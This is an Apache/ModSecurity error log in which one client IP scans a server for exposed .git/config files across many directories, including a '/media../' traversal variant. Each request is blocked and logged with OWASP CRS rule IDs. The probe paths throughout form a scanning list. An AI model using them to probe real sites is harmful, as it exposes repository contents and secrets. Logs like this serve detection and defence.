[Sun Apr 20 18:22:33.784951 2025] [:error] [pid 2598990] [client 179.43.188.122:44178] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /src/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "aAUfSZopp4YK0qAensjBtAAAAAg"]
[Sun Apr 20 18:22:33.785106 2025] [:error] [pid 2598990] [client 179.43.188.122:44178] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "aAUfSZopp4YK0qAensjBtAAAAAg"]
[Sun Apr 20 18:22:33.785239 2025] [:error] [pid 2598990] [client 179.43.188.122:44178] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.git/config"] [unique_id "aAUfSZopp4YK0qAensjBtAAAAAg"]
[Sun Apr 20 18:22:33.789547 2025] [authz_core:error] [pid 2597531] [client 179.43.188.122:44184] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.git
[Sun Apr 20 18:22:33.793838 2025] [:error] [pid 2599013] [client 179.43.188.122:44196] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /staging/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-wAAAA8"]
[Sun Apr 20 18:22:33.794031 2025] [:error] [pid 2599013] [client 179.43.188.122:44196] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-wAAAA8"]
[Sun Apr 20 18:22:33.794162 2025] [:error] [pid 2599013] [client 179.43.188.122:44196] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/staging/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-wAAAA8"]
[Sun Apr 20 18:22:34.736709 2025] [:error] [pid 2599000] [client 179.43.188.122:44206] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqhwAAAAw"]
[Sun Apr 20 18:22:34.736964 2025] [:error] [pid 2599000] [client 179.43.188.122:44206] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqhwAAAAw"]
[Sun Apr 20 18:22:34.737121 2025] [:error] [pid 2599000] [client 179.43.188.122:44206] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqhwAAAAw"]
[Sun Apr 20 18:22:34.738322 2025] [:error] [pid 2597529] [client 179.43.188.122:44210] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /panel/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/panel/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KiwAAAAA"]
[Sun Apr 20 18:22:34.738543 2025] [:error] [pid 2597529] [client 179.43.188.122:44210] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/panel/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KiwAAAAA"]
[Sun Apr 20 18:22:34.738686 2025] [:error] [pid 2597529] [client 179.43.188.122:44210] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/panel/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KiwAAAAA"]
[Sun Apr 20 18:22:34.762533 2025] [:error] [pid 2598999] [client 179.43.188.122:44218] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQQAAAAs"]
[Sun Apr 20 18:22:34.762754 2025] [:error] [pid 2598999] [client 179.43.188.122:44218] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQQAAAAs"]
[Sun Apr 20 18:22:34.762931 2025] [:error] [pid 2598999] [client 179.43.188.122:44218] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQQAAAAs"]
[Sun Apr 20 18:22:34.764274 2025] [:error] [pid 2599012] [client 179.43.188.122:44230] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdAAAAA4"]
[Sun Apr 20 18:22:34.764491 2025] [:error] [pid 2599012] [client 179.43.188.122:44230] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdAAAAA4"]
[Sun Apr 20 18:22:34.764626 2025] [:error] [pid 2599012] [client 179.43.188.122:44230] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.git/config"] [unique_id "aAUfSrkRSM_wWuOY-YzxdAAAAA4"]
[Sun Apr 20 18:22:34.771759 2025] [authz_core:error] [pid 2598997] [client 179.43.188.122:44244] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
[Sun Apr 20 18:22:34.773868 2025] [authz_core:error] [pid 2598998] [client 179.43.188.122:44258] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Sun Apr 20 18:22:34.779191 2025] [:error] [pid 2598990] [client 179.43.188.122:44272] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /core/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtQAAAAg"]
[Sun Apr 20 18:22:34.779389 2025] [:error] [pid 2598990] [client 179.43.188.122:44272] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtQAAAAg"]
[Sun Apr 20 18:22:34.779529 2025] [:error] [pid 2598990] [client 179.43.188.122:44272] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.git/config"] [unique_id "aAUfSpopp4YK0qAensjBtQAAAAg"]
[Sun Apr 20 18:22:34.781723 2025] [:error] [pid 2599010] [client 179.43.188.122:44276] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "aAUfSnNuewUkVloE_4FcvAAAAA0"]
[Sun Apr 20 18:22:34.781936 2025] [:error] [pid 2599010] [client 179.43.188.122:44276] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "aAUfSnNuewUkVloE_4FcvAAAAA0"]
[Sun Apr 20 18:22:34.782070 2025] [:error] [pid 2599010] [client 179.43.188.122:44276] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "aAUfSnNuewUkVloE_4FcvAAAAA0"]
[Sun Apr 20 18:22:34.789323 2025] [:error] [pid 2597531] [client 179.43.188.122:44292] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSHwAAAAI"]
[Sun Apr 20 18:22:34.789520 2025] [:error] [pid 2597531] [client 179.43.188.122:44292] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSHwAAAAI"]
[Sun Apr 20 18:22:34.789567 2025] [:error] [pid 2599013] [client 179.43.188.122:44302] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media../.git/config"] [unique_id "aAUfSsJN6RtskYJNqtKL_AAAAA8"]
[Sun Apr 20 18:22:34.789651 2025] [:error] [pid 2597531] [client 179.43.188.122:44292] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.git/config"] [unique_id "aAUfSivq4uit1rpTjEgSHwAAAAI"]
[Sun Apr 20 18:22:34.789749 2025] [:error] [pid 2599013] [client 179.43.188.122:44302] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media../.git/config"] [unique_id "aAUfSsJN6RtskYJNqtKL_AAAAA8"]
[Sun Apr 20 18:22:34.789898 2025] [:error] [pid 2599013] [client 179.43.188.122:44302] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/media../.git/config"] [unique_id "aAUfSsJN6RtskYJNqtKL_AAAAA8"]
[Sun Apr 20 18:22:34.799143 2025] [:error] [pid 2597529] [client 179.43.188.122:44324] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /frontend/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KjAAAAAA"]
[Sun Apr 20 18:22:34.799328 2025] [:error] [pid 2597529] [client 179.43.188.122:44324] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KjAAAAAA"]
[Sun Apr 20 18:22:34.799470 2025] [:error] [pid 2597529] [client 179.43.188.122:44324] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/frontend/.git/config"] [unique_id "aAUfSgZGKWoSh0bB6I5KjAAAAAA"]
[Sun Apr 20 18:22:34.800108 2025] [:error] [pid 2599000] [client 179.43.188.122:44310] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqiAAAAAw"]
[Sun Apr 20 18:22:34.800302 2025] [:error] [pid 2599000] [client 179.43.188.122:44310] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqiAAAAAw"]
[Sun Apr 20 18:22:34.800443 2025] [:error] [pid 2599000] [client 179.43.188.122:44310] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "aAUfSi74hH9DYn7JWeMqiAAAAAw"]
[Sun Apr 20 18:22:34.804498 2025] [:error] [pid 2598999] [client 179.43.188.122:44330] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /docs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docs/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQgAAAAs"]
[Sun Apr 20 18:22:34.804681 2025] [:error] [pid 2598999] [client 179.43.188.122:44330] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docs/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQgAAAAs"]
[Sun Apr 20 18:22:34.804866 2025] [:error] [pid 2598999] [client 179.43.188.122:44330] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/docs/.git/config"] [unique_id "aAUfSjBDed00_-uEOh9oQgAAAAs"]
